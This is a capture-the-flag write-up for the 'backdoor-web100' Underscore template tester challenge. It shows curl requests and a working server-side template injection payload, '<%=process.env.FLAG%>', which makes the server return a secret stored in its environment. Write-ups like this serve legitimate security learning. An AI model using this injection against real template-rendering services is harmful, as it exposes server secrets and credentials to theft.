In this problem, the challenge text just provided us a URL to the page, https://backdoor-web100.herokuapp.com/, which linked us to the source code on github.
curl 'https://backdoor-web100.herokuapp.com/'
<html> <head> <title>Underscore Template Tester</title> <style rel="stylesheet" type="text/cs" href="//cdnjs.cloudflare.com/ajax/libs/normalize/3.0.0/normalize.min.css"></style> </head> <body> <h1>Underscore Template Tester</h1> <form action="/templatize" method="POST"> <p>This app takes in JSON data and a template and mashes them together using underscore.js</p> <textarea name="json" rows="10" cols="30" placeholder="Enter JSON data">{"package":"underscore_test","version": "2.9.12"}</textarea> <br> <textarea name="template" rows="10" cols="30" placeholder="Enter your template here">The name of the package is <%=package%> and its version is <%=version%></textarea> <br> <input type="submit" value="Convert!"> </form><br> <p>Source code for this is available at https://github.com/backdoor-ctf/web100</p> </body> </html>
Querying the server, it behaves pretty much as expected...
curl 'https://backdoor-web100.herokuapp.com/templatize' --data 'json=%7B%0D%0A%22package%22%3A%22underscore_test%22%2C%0D%0A%22version%22%3A+%222.9.12%22%0D%0A%7D%0D%0A&template=The+name+of+the+package+is+%3C%25%3Dpackage%25%3E+and+its+version+is+%3C%25%3Dversion%25%3E%0D%0A'
json={"package":"underscore_test","version":+"2.9.12"} &template=The+name+of+the+package+is+<%=package%>+and+its+version+is+<%=version%>
The name of the package is underscore_test and its version is 2.9.12
Going back to the source code reveals a very interesting line in app.js though:
// development only if ('development' == app.get('env')) { app.use(express.errorHandler()); } if(!process.env.FLAG) { console.error("No flag in environment"); process.exit(1); }
So... the flag is stored in the environment on the server. Well, we have limited code execution - lets try to expose it!
curl 'https://backdoor-web100.herokuapp.com/templatize' --data 'json=%7B%7D%0D%0A&template=%3C%25%3Dprocess.env.FLAG%25%3E'
json={}&template=<%=process.env.FLAG%>
16367694ede9faef0efec36845e18ceb
Flag: 16367694ede9faef0efec36845e18ceb